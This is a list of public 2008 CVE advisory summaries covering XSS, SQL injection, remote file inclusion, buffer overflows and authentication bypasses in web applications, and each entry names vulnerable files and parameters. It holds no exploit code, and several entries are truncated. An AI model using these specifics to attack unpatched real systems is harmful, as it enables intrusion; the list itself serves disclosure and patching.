[CVE-2008-2298] Admin.php in Web Slider 0.6 allows remote attackers to bypass authentication and gain privileges by setting the admin cookie to 1.
[CVE-2008-2295] Cross-site scripting (XSS) vulnerability in rg_search.php in Rgboard 3.0.12, and possibly earlier versions, allows remote attackers to inject arbitrary web script or HTML via the s_text parameter and other unspecified vectors.
[CVE-2008-2290] Unspecified vulnerability in the Agent user interface in Symantec Altiris Deployment Solution 6.8.x and 6.9.x before 6.9.176 allows local users to gain privileges via unknown attack vectors.
[CVE-2008-2281] Cross-zone scripting vulnerability in the Print Table of Links feature in Internet Explorer 6.0, 7.0, and 8.0b allows user-assisted remote attackers to inject arbitrary web script or HTML in the Local Machine Zone via an HTML document with a link containing JavaScript sequences, which are evaluated by a resource script when a user prints this document.
[CVE-2008-2280] Cross-site scripting (XSS) vulnerability in admin/index.php in Script PHP PicEngine 1.0 allows remote attackers to inject arbitrary web script or HTML via the l parameter. NOTE: the provenance of this information is unknown
[CVE-2008-2274] Cross-site scripting (XSS) vulnerability in the sr_feuser_register 1.4.0, 1.6.0, 2.2.1 to 2.2.7, 2.3.0 to 2.3.6, 2.4.0, and 2.5.0 to 2.5.9 extension for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-2264] Cross-site scripting (XSS) vulnerability in index.php in CyrixMED 1.4 allows remote attackers to inject arbitrary web script or HTML via the msg_erreur parameter. NOTE: the provenance of this information is unknown
[CVE-2008-2248] Cross-site scripting (XSS) vulnerability in Outlook Web Access (OWA) for Exchange Server 2003 SP2 allows remote attackers to inject arbitrary web script or HTML via unspecified HTML, a different vulnerability than CVE-2008-2247.
[CVE-2008-2247] Cross-site scripting (XSS) vulnerability in Outlook Web Access (OWA) for Exchange Server 2003 SP2 allows remote attackers to inject arbitrary web script or HTML via unspecified e-mail fields, a different vulnerability than CVE-2008-2248.
[CVE-2008-2240] Stack-based buffer overflow in the Web Server service in IBM Lotus Domino before 7.0.3 FP1, and 8.x before 8.0.1, allows remote attackers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a long Accept-Language HTTP header.
[CVE-2008-2236] Cross-site scripting (XSS) vulnerability in blosxom.cgi in Blosxom before 2.1.2 allows remote attackers to inject arbitrary web script or HTML via the flav parameter (flavour variable). NOTE: some of these details are obtained from third party information.
[CVE-2008-2221] Unspecified vulnerability in the Java plugin in IBM WebSphere Application Server 5.0.2 allows untrusted applets to gain privileges via unknown attack vectors.
[CVE-2008-2219] Cross-site scripting (XSS) vulnerability in install.php in C-News.fr C-News 1.0.1 allows remote attackers to inject arbitrary web script or HTML via the etape parameter.
[CVE-2008-2213] Multiple cross-site scripting (XSS) vulnerabilities in admin/inc/footer.php in Maian Links 3.1 allow remote attackers to inject arbitrary web script or HTML via the (1) msg_script2 and (2) msg_script3 parameters.
[CVE-2008-2212] Multiple cross-site scripting (XSS) vulnerabilities in Maian Cart 1.1 allow remote attackers to inject arbitrary web script or HTML via the (1) msg_adminheader, (2) msg_adminheader2, (3) msg_adminheader3, (4) msg_adminheader4, and unspecified other parameters to admin/inc/header.php.
[CVE-2008-2211] Multiple cross-site scripting (XSS) vulnerabilities in admin/inc/footer.php in Maian Guestbook 3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) msg_script2 and (2) msg_script3 parameters.
[CVE-2008-2210] Multiple cross-site scripting (XSS) vulnerabilities in Maian Support 1.3 allow remote attackers to inject arbitrary web script or HTML via the (1) msg_script, (2) msg_script2, and (3) msg_script3 parameters to admin/inc/footer.php.
[CVE-2008-2209] Multiple cross-site scripting (XSS) vulnerabilities in admin/inc/header.php in Maian Greeting 2.1 allow remote attackers to inject arbitrary web script or HTML via the (1) msg_script and (2) msg_script2 parameters.
[CVE-2008-2207] Cross-site scripting (XSS) vulnerability in admin/index.php in Maian Gallery 2.0 allows remote attackers to inject arbitrary web script or HTML via the keywords parameter in a search action.
[CVE-2008-2206] Multiple cross-site scripting (XSS) vulnerabilities in Maian Music 1.1 allow remote attackers to inject arbitrary web script or HTML via the (1) keywords parameter in a search action to index.php, and the (2) msg_script parameter to admin/inc/footer.php.
[CVE-2008-2204] Multiple cross-site scripting (XSS) vulnerabilities in admin/inc/header.php in Maian Search 1.1 allow remote attackers to inject arbitrary web script or HTML via the (1) header, (2) header2, (3) header3, (4) header4, (5) header5, (6) header6, (7) header7, (8) header8, and (9) header9 parameters.
[CVE-2008-2202] Multiple cross-site scripting (XSS) vulnerabilities in Maian Uploader 4.0 allow remote attackers to inject arbitrary web script or HTML via the (1) keywords parameter to upload/admin/index.php in a search action, the (2) msg_charset and (3) msg_header9 parameters to admin/inc/header.php, and the (4) keywords parameter to index.php in a search action.
[CVE-2008-2201] Multiple cross-site scripting (XSS) vulnerabilities in admin/inc/header.php in Maian Recipe 1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) header, (2) header2, (3) header3, (4) header4, (5) header5, (6) header6, (7) header7, (8) header8, and (9) header9 parameters.
[CVE-2008-2200] Multiple cross-site scripting (XSS) vulnerabilities in Maian Weblog 4.0 allow remote attackers to inject arbitrary web script or HTML via the (1) keywords parameter to admin/index.php in a blogs search action, the (2) msg_charset and (3) msg_header9 parameters to admin/inc/header.php, and the (4) keywords parameter to index.php in a search action.
[CVE-2008-2197] SQL injection vulnerability in the blogwriter module 2.0 for Miniweb allows remote attackers to execute arbitrary SQL commands via the historymonth parameter to index.php.
[CVE-2008-2196] Cross-site scripting (XSS) vulnerability in admin.php in LifeType 1.2.8 allows remote attackers to inject arbitrary web script or HTML via the newBlogUserName parameter in an addBlogUser action, a different vector than CVE-2008-2178.
[CVE-2008-2188] Multiple cross-site scripting (XSS) vulnerabilities in EJ3 BlackBook 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) bookCopyright and (2) ver parameters to (a) footer.php, and the (3) bookName, (4) bookMetaTags, and (5) estiloCSS parameters to (b) header.php.
[CVE-2008-2186] Cross-site scripting (XSS) vulnerability in index.php in Chilek Content Management System (aka ChiCoMaS) 2.0.4 allows remote attackers to inject arbitrary web script or HTML via the q parameter.
[CVE-2008-2182] Cross-site scripting (XSS) vulnerability in the powermail extension before 1.1.10 for TYPO3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-2181] Multiple cross-site scripting (XSS) vulnerabilities in search.php in cpLinks 1.03 allow remote attackers to inject arbitrary web script or HTML via the (1) search_text and (2) search_category parameters. NOTE: the XSS reportedly occurs in a forced SQL error message. NOTE: some of these details are obtained from third party information.
[CVE-2008-2179] Cross-site scripting (XSS) vulnerability in SystemList.jsp in SysAid 5.1.08 allows remote attackers to inject arbitrary web script or HTML via the searchField parameter. NOTE: the provenance of this information is unknown
[CVE-2008-2178] Cross-site scripting (XSS) vulnerability in admin.php in LifeType 1.2.7 allows remote attackers to inject arbitrary web script or HTML via the searchTerms parameter in an editArticleCategories operation (aka an admin category search).
[CVE-2008-2176] Cross-site scripting (XSS) vulnerability in admin/category.php in Zomplog 3.8.2 allows remote attackers to inject arbitrary web script or HTML via the catname parameter.
[CVE-2008-2168] Cross-site scripting (XSS) vulnerability in Apache 2.2.6 and earlier allows remote attackers to inject arbitrary web script or HTML via UTF-7 encoded URLs that are not properly handled when displaying the 403 Forbidden error page.
[CVE-2008-2167] Cross-site scripting (XSS) vulnerability in ZyXEL ZyWALL 100 allows remote attackers to inject arbitrary web script or HTML via the Referer header, which is not properly handled in a 404 Error page.
[CVE-2008-2166] Cross-site scripting (XSS) vulnerability in the search module in Sun Java System Web Server 6.1 before SP9 and 7.0 before Update 2 allows remote attackers to inject arbitrary web script or HTML via unknown parameters in index.jsp.
[CVE-2008-2165] Cross-site scripting (XSS) vulnerability in AccessCodeStart.asp in Cisco Building Broadband Service Manager (BBSM) Captive Portal 5.3 allows remote attackers to inject arbitrary web script or HTML via the msg parameter.
[CVE-2008-2163] Cross-site scripting (XSS) vulnerability in IBM Lotus Quickr 8.1 before Hotfix 5 for Windows and AIX, and before Hotfix 3 for i5/OS, allows remote attackers to inject arbitrary web script or HTML via unknown vectors related to "WYSIWYG editors."
[CVE-2008-2162] Cross-site scripting (XSS) vulnerability in SonicWall Email Security 6.1.1 allows remote attackers to inject arbitrary web script or HTML via the Host header in a request to a non-existent web page, which is not properly sanitized in an error page.
[CVE-2008-2158] Multiple stack-based buffer overflows in the Command Line Interface process in the Server Agent in EMC AlphaStor 3.1 SP1 for Windows allow remote attackers to execute arbitrary code via crafted TCP packets to port 41025.
[CVE-2008-2143] Unspecified versions of Microsoft Outlook Web Access (OWA) use the Cache-Control: no-cache HTTP directive instead of no-store, which might cause web browsers that follow RFC-2616 to cache sensitive information.
[CVE-2008-2136] Memory leak in the ipip6_rcv function in net/ipv6/sit.c in the Linux kernel 2.4 before 2.4.36.5 and 2.6 before 2.6.25.3 allows remote attackers to cause a denial of service (memory consumption) via network traffic to a Simple Internet Transition (SIT) tunnel interface, related to the pskb_may_pull and kfree_skb functions, and management of an skb reference count.
[CVE-2008-2133] Cross-site scripting (XSS) vulnerability in the Journal module in Tru-Zone Nuke ET 3.x allows remote attackers to inject arbitrary web script or HTML via the title parameter in a new entry, as demonstrated by a CSS property in the STYLE attribute of a DIV element, a different vulnerability than CVE-2008-1873.
[CVE-2008-2131] Cross-site scripting (XSS) vulnerability in mvnForum 1.1 GA allows remote authenticated users to inject arbitrary web script or HTML via the topic field, which is later displayed by user/viewthread.jsp through use of the "quick reply button."
[CVE-2008-2127] Cross-site scripting (XSS) vulnerability in search.php in CMS Faethon 2.2 Ultimate allows remote attackers to inject arbitrary web script or HTML via the what parameter. NOTE: some of these details are obtained from third party information.
[CVE-2008-2126] Multiple cross-site scripting (XSS) vulnerabilities in Tux CMS 0.1 allow remote attackers to inject arbitrary web script or HTML via the (1) q parameter to index.php and the (2) returnURL parameter to tux-login.php.
[CVE-2008-2123] Cross-site scripting (XSS) vulnerability in WGate in SAP Internet Transaction Server (ITS) 6.20 allows remote attackers to inject arbitrary web script or HTML via (1) a "<>" sequence in the ~service parameter to wgate.dll, or (2) Javascript splicing in the query string, a different vector than CVE-2006-5114.
[CVE-2008-2120] Unspecified vulnerability in Sun Java System Application Server 7 2004Q2 before Update 6, Web Server 6.1 before SP8, and Web Server 7.0 before Update 1 allows remote attackers to obtain source code of JSP files via unknown vectors.
[CVE-2008-2117] Cross-site scripting (XSS) vulnerability in pages/news.page.inc in Project Alumni 1.0.9 allows remote attackers to inject arbitrary web script or HTML via the year parameter in a news action to index.php, a different vector than CVE-2007-6126.
[CVE-2008-2115] Multiple cross-site scripting (XSS) vulnerabilities in editor.php in ScriptsEZ.net Power Editor 2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) te and (2) dir parameters in a tempedit action.
[CVE-2008-2103] Cross-site scripting (XSS) vulnerability in Bugzilla 2.17.2 and later allows remote attackers to inject arbitrary web script or HTML via the id parameter to the "Format for Printing" view or "Long Format" bug list.
[CVE-2008-2087] SQL injection vulnerability in search_result.php in Softbiz Web Host Directory Script, when magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary SQL commands via the host_id parameter, a different vector than CVE-2005-3817.
[CVE-2008-2086] Sun Java Web Start and Java Plug-in for JDK and JRE 6 Update 10 and earlier
[CVE-2008-2082] Cross-site scripting (XSS) vulnerability in index.php in Siteman 2.0.x2 allows remote attackers to inject arbitrary web script or HTML via the module parameter, which leaks the path in an error message.
[CVE-2008-2077] Unspecified vulnerability in Plain Black WebGUI 7.4.34 has unknown impact and attack vectors related to "data form list view."
[CVE-2008-2075] Cross-site scripting (XSS) vulnerability in pic.php in AstroCam 2.5.0 through 2.7.3 allows remote attackers to inject arbitrary web script or HTML via the picfile parameter.
[CVE-2008-2072] Cross-site scripting (XSS) vulnerability in index.php in Virtual Design Studio vlbook 1.21 allows remote attackers to inject arbitrary web script or HTML via the l parameter, a different vector than CVE-2006-3260.
[CVE-2008-2070] The WHM interface 11.15.0 for cPanel 11.18 before 11.18.4 and 11.22 before 11.22.3 allows remote attackers to bypass XSS protection and inject arbitrary script or HTML via repeated, improperly-ordered "<" and ">" characters in the (1) issue parameter to scripts2/knowlegebase, (2) user parameter to scripts2/changeip, (3) search parameter to scripts2/listaccts, and other unspecified vectors.
[CVE-2008-2068] Cross-site scripting (XSS) vulnerability in WordPress 2.5 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-2066] Cross-site scripting (XSS) vulnerability in bb_admin.php in miniBB 2.2a allows remote attackers to inject arbitrary web script or HTML via the whatus parameter in a searchusers2 action. NOTE: it was later reported that other versions before 3.0.1 are also vulnerable.
[CVE-2008-2064] Multiple unspecified vulnerabilities in PhpGedView before 4.1.5 have unknown impact and attack vectors related to "a fundamental design flaw in the interface (API) to connect phpGedView with external programs like content management systems."
[CVE-2008-2056] Cisco Adaptive Security Appliance (ASA) and Cisco PIX security appliance 8.0.x before 8.0(3)9 and 8.1.x before 8.1(1)1 allows remote attackers to cause a denial of service (device reload) via a crafted Transport Layer Security (TLS) packet to the device interface.
[CVE-2008-2055] Cisco Adaptive Security Appliance (ASA) and Cisco PIX security appliance 7.1.x before 7.1(2)70, 7.2.x before 7.2(4), and 8.0.x before 8.0(3)10 allows remote attackers to cause a denial of service via a crafted TCP ACK packet to the device interface.
[CVE-2008-2052] Open redirect vulnerability in redirect.php in Bitrix Site Manager 6.5 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the goto parameter.
[CVE-2008-2048] Cross-site scripting (XSS) vulnerability in hpz/admin/Default.asp in Angelo-Emlak 1.0 allows remote attackers to inject arbitrary web script or HTML via the sayfa parameter.
[CVE-2008-2046] Cross-site scripting (XSS) vulnerability in index.php in Softpedia SiteXS CMS 0.1.1 Pre-Alpha allows remote attackers to inject arbitrary web script or HTML via the user parameter.
[CVE-2008-2041] Multiple unspecified vulnerabilities in eGroupWare before 1.4.004 have unspecified attack vectors and "grave" impact when the web server has write access to a directory under the web document root.
[CVE-2008-2038] Multiple SQL injection vulnerabilities in admin/adminindex.php in Turnkey Web Tools SunShop Shopping Cart 4.1.0 allow remote authenticated administrators to execute arbitrary SQL commands via the (1) orderby and (2) sort parameters. NOTE: the provenance of this information is unknown
[CVE-2008-2037] Multiple cross-site scripting (XSS) vulnerabilities in EditeurScripts EsContacts 1.0 allow remote authenticated users to inject arbitrary web script or HTML via the msg parameter to (1) login.php, (2) importer.php, (3) add_groupe.php, (4) contacts.php, (5) groupes.php, and (6) search.php.
[CVE-2008-2035] Cross-site scripting (XSS) vulnerability in the Bluemoon, Inc. (1) BackPack 0.91 and earlier, (2) BmSurvey 0.84 and earlier, (3) newbb_fileup 1.83 and earlier, (4) News_embed (news_fileup) 1.44 and earlier, and (5) PopnupBlog 3.19 and earlier modules for XOOPS 2.0.x, XOOPS Cube 2.1, and ImpressCMS allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-2030] Cross-site scripting (XSS) vulnerability in installControl.php3 in F5 FirePass 4100 SSL VPN 5.4.2-5.5.2 and 6.0-6.2 allows remote attackers to inject arbitrary web script or HTML via the query string. NOTE: the provenance of this information is unknown
[CVE-2008-2027] Open redirect vulnerability in WebID/IISWebAgentIF.dll in RSA Authentication Agent 5.3.0.258 for Web for IIS, when accessed via certain browsers such as Mozilla Firefox, allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via an ftp URL in the url parameter to a Redirect action.
[CVE-2008-2026] Cross-site scripting (XSS) vulnerability in WebID/IISWebAgentIF.dll in RSA Authentication Agent 5.3.0.258, and other versions before 5.3.3.378, allows remote attackers to inject arbitrary web script or HTML via a URL-encoded postdata parameter. NOTE: this is different than CVE-2005-1118, but it might be the same as CVE-2008-1470.
[CVE-2008-2025] Cross-site scripting (XSS) vulnerability in Apache Struts before 1.2.9-162.31.1 on SUSE Linux Enterprise (SLE) 11, before 1.2.9-108.2 on SUSE openSUSE 10.3, before 1.2.9-198.2 on SUSE openSUSE 11.0, and before 1.2.9-162.163.2 on SUSE openSUSE 11.1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "insufficient quoting of parameters."
[CVE-2008-2024] Cross-site scripting (XSS) vulnerability in index.php in miniBB 2.2, and possibly earlier, when register_globals is enabled, allows remote attackers to inject arbitrary web script or HTML via the glang[] parameter in a registernew action.
[CVE-2008-2022] Multiple cross-site scripting (XSS) vulnerabilities in PD9 Software MegaBBS 2.2 allow remote attackers to inject arbitrary web script or HTML via the (1) toid parameter to send-private-message.asp and the (2) redirect parameter to admin/impersonate.asp. NOTE: vector 2 requires authentication.
[CVE-2008-2020] The CAPTCHA implementation as used in (1) Francisco Burzi PHP-Nuke 7.0 and 8.1, (2) my123tkShop e-Commerce-Suite (aka 123tkShop) 0.9.1, (3) phpMyBitTorrent 1.2.2, (4) TorrentFlux 2.3, (5) e107 0.7.11, (6) WebZE 0.5.9, (7) Open Media Collectors Database (aka OpenDb) 1.5.0b4, and (8) Labgab 1.1 uses a code_bg.jpg background image and the PHP ImageString function in a way that produces an insufficient number of different images, which allows remote attackers to pass the CAPTCHA test via an automated attack using a table of all possible image checksums and their corresponding digit strings.
[CVE-2008-2011] Cross-site scripting (XSS) vulnerability in the National Rail Enquiries Live Departure Boards gadget before 1.1 allows remote National Rail Enquiries servers or man-in-the-middle attackers to inject arbitrary web script or HTML, and execute arbitrary code, via a response body, as demonstrated by a SCRIPT element that references a vbscript: URI.
[CVE-2008-2003] BadBlue 2.72 Personal Edition stores multiple programs in the web document root with insufficient access control, which allows remote attackers to (1) cause a denial of service via multiple invocations of uninst.exe, and have an unknown impact via (2) badblue.exe and (3) dyndns.exe. NOTE: this can be leveraged for arbitrary remote code execution in conjunction with CVE-2007-6378.
[CVE-2008-1991] Cross-site scripting (XSS) vulnerability in admin_colors_swatch.asp in Acidcat CMS 3.4.1 allows remote attackers to inject arbitrary web script or HTML via the field parameter.
[CVE-2008-1987] Cross-site scripting (XSS) vulnerability in search.php in EncapsGallery 2.0.2 allows remote attackers to inject arbitrary web script or HTML via the search parameter.
[CVE-2008-1986] Cross-site scripting (XSS) vulnerability in liste_article.php in Blog Pixel Motion (aka PixelMotion) allows remote attackers to inject arbitrary web script or HTML via the jours parameter.
[CVE-2008-1985] Cross-site scripting (XSS) vulnerability in base.php in DigitalHive 2.0 RC2 allows remote attackers to inject arbitrary web script or HTML via the mt parameter, possibly related to membres.php.
[CVE-2008-1983] Cross-site scripting (XSS) vulnerability in Advanced Electron Forum (AEF) 1.0.6 allows remote attackers to inject arbitrary web script or HTML via the beg parameter in a members action to index.php.
[CVE-2008-1980] Cross-site scripting (XSS) vulnerability in E-Publish 5.x before 5.x-1.1 and 6.x before 6.x-1.0 beta1, a Drupal module, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-1978] Cross-site scripting (XSS) vulnerability in the Ubercart 5.x before 5.x-1.0 rc3 module for Drupal allows remote authenticated users to inject arbitrary web script or HTML via node titles related to unspecified product features, a different vector than CVE-2008-1428.
[CVE-2008-1974] Cross-site scripting (XSS) vulnerability in addevent.php in Horde Kronolith 2.1.7, Groupware Webmail Edition 1.0.6, and Groupware 1.0.5 allows remote attackers to inject arbitrary web script or HTML via the url parameter.
[CVE-2008-1972] Multiple cross-site scripting (XSS) vulnerabilities in the user account creation feature in Exponent CMS 0.96.6-GA20071003 and earlier, when the Allow Registration? configuration option is enabled, allow remote attackers to inject arbitrary web script or HTML via the (1) username, (2) firstname, (3) lastname, and (4) e-mail address fields. NOTE: some of these details are obtained from third party information.
[CVE-2008-1969] Multiple cross-site scripting (XSS) vulnerabilities in Cezanne 6.5.1 and 7 allow remote attackers to inject arbitrary web script or HTML via the (1) LookUPId and (2) CbFun parameters to (a) CFLookUP.asp
[CVE-2008-1967] Cross-site scripting (XSS) vulnerability in CFLogon/CFLogon.asp in Cezanne 6.5.1 and 7 allows remote attackers to inject arbitrary web script or HTML via the SleUserName parameter.
[CVE-2008-1963] PHP remote file inclusion vulnerability in includes/functions.php in Quate Grape Web Statistics 0.2a allows remote attackers to execute arbitrary PHP code via a URL in the location parameter.
[CVE-2008-1961] SQL injection vulnerability in index.php in Voice Of Web AllMyGuests 0.4.1 allows remote attackers to execute arbitrary SQL commands via the AMG_id parameter in a comments action.
[CVE-2008-1960] Cross-site scripting (XSS) vulnerability in cgi-bin/contray/search.cgi in ContRay 3.x allows remote attackers to inject arbitrary web script or HTML via the search parameter. NOTE: the provenance of this information is unknown
[CVE-2008-1956] Cross-site scripting (XSS) vulnerability in index.php in Wikepage Opus 13 2007.2 allows remote attackers to inject arbitrary web script or HTML via the wiki parameter.
[CVE-2008-1955] Cross-site scripting (XSS) vulnerability in rep.php in Martin BOUCHER MyBoard 1.0.12 allows remote attackers to inject arbitrary web script or HTML via the id parameter.
[CVE-2008-1954] SQL injection vulnerability in one_day.php in Web Calendar Pro 4.1 and earlier allows remote attackers to execute arbitrary SQL commands via the user_id parameter.
[CVE-2008-1953] Cross-site scripting (XSS) vulnerability in the Sitedesigner before 1.1.5 search template in Magnolia Enterprise Edition allows remote attackers to inject arbitrary web script or HTML via the query parameter. NOTE: the provenance of this information is unknown
[CVE-2008-1947] Cross-site scripting (XSS) vulnerability in Apache Tomcat 5.5.9 through 5.5.26 and 6.0.0 through 6.0.16 allows remote attackers to inject arbitrary web script or HTML via the name parameter (aka the hostname attribute) to host-manager/html/add.
[CVE-2008-1941] Cross-site scripting (XSS) vulnerability in the profile update feature in Akiva WebBoard 8.0 allows remote authenticated users to inject arbitrary web script or HTML via unspecified vectors in the form field. NOTE: the provenance of this information is unknown
[CVE-2008-1938] Sony Mylo COM-2 Japanese model firmware before 1.002 does not properly verify web server SSL certificates, which allows remote attackers to obtain sensitive information and conduct spoofing attacks.
[CVE-2008-1917] Multiple cross-site scripting (XSS) vulnerabilities in AMFPHP 1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) class parameter to (a) methodTable.php, (b) code.php, and (c) details.php in browser/
[CVE-2008-1916] Multiple cross-site scripting (XSS) vulnerabilities in the Ubercart 5.x before 5.x-1.0-rc1 module for Drupal allow remote attackers to inject arbitrary web script or HTML via text fields intended for the (1) address and (2) order information, which are later displayed on the order view page and unspecified other administrative pages, a different vulnerability than CVE-2008-1428.
[CVE-2008-1906] Cross-site scripting (XSS) vulnerability in calendar.php in cpCommerce 1.1.0 allows remote attackers to inject arbitrary web script or HTML via the year parameter in a view.year action.
[CVE-2008-1898] A certain ActiveX control in WkImgSrv.dll 7.03.0616.0, as distributed in Microsoft Works 7 and Microsoft Office 2003 and 2007, allows remote attackers to execute arbitrary code or cause a denial of service (browser crash) via an invalid WksPictureInterface property value, which triggers an improper function call.
[CVE-2008-1896] Multiple cross-site scripting (XSS) vulnerabilities in Carbon Communities 2.4 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) Redirect parameter to login.asp and the (2) OrderBy parameter to member_send.asp.
[CVE-2008-1894] Cross-site scripting (XSS) vulnerability in desktoplaunch/InfoView/logon/logon.object in BusinessObjects InfoView XI R2 SP1, SP2, and SP3 Java version before FixPack 3.5 allows remote attackers to inject arbitrary web script or HTML via the cms parameter.
[CVE-2008-1892] Cross-site scripting (XSS) vulnerability in bs_auth.php in Blogator-script 0.95 and 1.01 allows remote attackers to inject arbitrary web script or HTML via the msg parameter. NOTE: the provenance of this information is unknown
[CVE-2008-1891] Directory traversal vulnerability in WEBrick in Ruby 1.8.4 and earlier, 1.8.5 before 1.8.5-p231, 1.8.6 before 1.8.6-p230, 1.8.7 before 1.8.7-p22, and 1.9.0 before 1.9.0-2, when using NTFS or FAT filesystems, allows remote attackers to read arbitrary CGI files via a trailing (1) + (plus), (2) %2b (encoded plus), (3) . (dot), (4) %2e (encoded dot), or (5) %20 (encoded space) character in the URI, possibly related to the WEBrick::HTTPServlet::FileHandler and WEBrick::HTTPServer.new functionality and the :DocumentRoot option.
[CVE-2008-1888] Cross-site scripting (XSS) vulnerability in Microsoft Windows SharePoint Services 2.0 allows remote attackers to inject arbitrary web script or HTML via the Picture Source (aka picture object source) field in the Rich Text Editor.
[CVE-2008-1886] The NeffyLauncher 1.0.5 ActiveX control (NeffyLauncher.dll) in CDNetworks Nefficient Download uses weak cryptography for a KeyCode that blocks unauthorized use of the control, which allows remote attackers to bypass this protection mechanism by calculating the required KeyCode. NOTE: this can be used by arbitrary web sites to host exploit code that targets this control.
[CVE-2008-1875] SQL injection vulnerability in index.php in Terong PHP Photo Gallery (aka Advanced Web Photo Gallery) 1.0 allows remote attackers to execute arbitrary SQL commands via the photo_id parameter.
[CVE-2008-1873] Cross-site scripting (XSS) vulnerability in the private message feature in Nuke ET 3.2 and 3.4, when using Internet Explorer, allows remote authenticated users to inject arbitrary web script or HTML via a CSS property in the STYLE attribute of a DIV element in the mensaje parameter. NOTE: some of these details are obtained from third party information.
[CVE-2008-1854] Unspecified vulnerability in SmarterMail Web Server (SMWebSvr.exe) in SmarterMail 5.0.2999 allows remote attackers to cause a denial of service (service termination) via a long HTTP (1) GET, (2) HEAD, (3) PUT, (4) POST, or (5) TRACE request. NOTE: the provenance of this information is unknown
[CVE-2008-1850] Multiple cross-site scripting (XSS) vulnerabilities in login.php in Omnistar Interactive OSI Affiliate allow remote attackers to inject arbitrary web script or HTML via the (1) login, (2) profile, (3) profile2, and (4) ref parameters.
[CVE-2008-1848] Cross-site scripting (XSS) vulnerability in the joomlaXplorer (com_joomlaxplorer) Mambo/Joomla! component 1.6.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the error parameter in a show_error action to index.php.
[CVE-2008-1839] Multiple cross-site scripting (XSS) vulnerabilities in module/main.php in WORK system e-commerce 4.0.9 allow remote attackers to inject arbitrary web script or HTML via the (1) day, (2) month, and (3) year parameters. NOTE: the provenance of this information is unknown
[CVE-2008-1800] Multiple cross-site scripting (XSS) vulnerabilities in index.php in DivXDB 2002 0.94b allow remote attackers to inject arbitrary web script or HTML via the (1) choice, (2) _page_, (3) zone_admin, (4) general_search, and (5) import parameters. NOTE: the provenance of this information is unknown
[CVE-2008-1797] Unspecified vulnerability in Secure Computing Webwasher 5.30 before build 3159 and 6.3.0 before build 3150 allows remote attackers to cause a denial of service (freeze) via a crafted URL.
[CVE-2008-1795] Multiple cross-site scripting (XSS) vulnerabilities in Blackboard Academic Suite 7.x and earlier, and possibly some 8.0 versions, allow remote attackers to inject arbitrary web script or HTML via (1) the searchText parameter in a Course action to webapps/blackboard/execute/viewCatalog or (2) the data__announcements___pk1_pk2__subject parameter in an ADD action to bin/common/announcement.pl.
[CVE-2008-1794] Multiple cross-site scripting (XSS) vulnerabilities in the Webform Drupal module 5.x before 5.x-1.10, 5.x-2.x before 5.x-2.0-beta3, and 6.x before 6.x-1.0-beta3 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-1793] Multiple cross-site scripting (XSS) vulnerabilities in view.cgi in Smart Classified ADS Professional, Smart Photo ADS, and Smart Photo ADS Gold allow remote attackers to inject arbitrary web script or HTML via the (1) AdNum and (2) Department parameters. NOTE: the provenance of this information is unknown
[CVE-2008-1792] Cross-site scripting (XSS) vulnerability in the insertion filter in the Flickr Drupal module 5.x before 5.x-1.3 and 6.x before 6.x-1.0-alpha allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2008-1787] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Poplar Gedcom Viewer 2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) text and (2) ul parameters. NOTE: the provenance of this information is unknown
[CVE-2008-1775] Cross-site scripting (XSS) vulnerability in mindex.do in ManageEngine Firewall Analyzer 4.0.3 allows remote attackers to inject arbitrary web script or HTML via the displayName parameter. NOTE: the provenance of this information is unknown
[CVE-2008-1757] Cross-site scripting (XSS) vulnerability in index.php in the ConcoursPhoto module for KwsPHP 1.0 allows remote attackers to inject arbitrary web script or HTML via the VIEW parameter.
[CVE-2008-1753] Cross-site scripting (XSS) vulnerability in system/workplace/admin/workplace/sessions.jsp in Alkacon OpenCMS 7.0.3 allows remote attackers to inject arbitrary web script or HTML via the searchfilter parameter, a different vector than CVE-2008-1510.
[CVE-2008-1752] ezRADIUS 0.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain credentials via a direct request for (1) config.ini or (2) database.ini. NOTE: some of these details are obtained from third party information.
[CVE-2008-1716] Cross-site scripting (XSS) vulnerability in WoltLab Community Framework (WCF) 1.0.6 in WoltLab Burning Board 3.0.5 allows remote attackers to inject arbitrary web script or HTML via the (1) page and (2) form parameters, which are not properly handled when they are reflected back in an error message.
[CVE-2008-1712] PHP remote file inclusion vulnerability in includes/functions_weblog.php in mxBB mx_blogs 2.0.0 beta allows remote attackers to execute arbitrary PHP code via a URL in the mx_root_path parameter.
[CVE-2008-1711] Terong PHP Photo Gallery (aka Advanced Web Photo Gallery) 1.0 stores passwords in cleartext in a MySQL database, which allows context-dependent attackers to obtain sensitive information.
[CVE-2008-1700] The Web TransferCtrl Class 8,2,1,4 (iManFile.cab), as used in WorkSite Web 8.2 before SP1 P2, allows remote attackers to cause a denial of service (memory consumption) via a large number of SendNrlLink directives, which opens a separate window for each directive.
[CVE-2008-1698] Cross-site scripting (XSS) vulnerability in gallery.php in Simple Gallery 2.2 allows remote attackers to inject arbitrary web script or HTML via the album parameter to index.php. NOTE: the provenance of this information is unknown
[CVE-2008-1690] WebContainer.exe 1.0.0.336 and earlier in SLMail Pro 6.3.1.0 and earlier allows remote attackers to cause a denial of service (memory corruption and daemon crash) or possibly execute arbitrary code via a long URI in HTTP requests to TCP port 801. NOTE: some of these details are obtained from third party information.
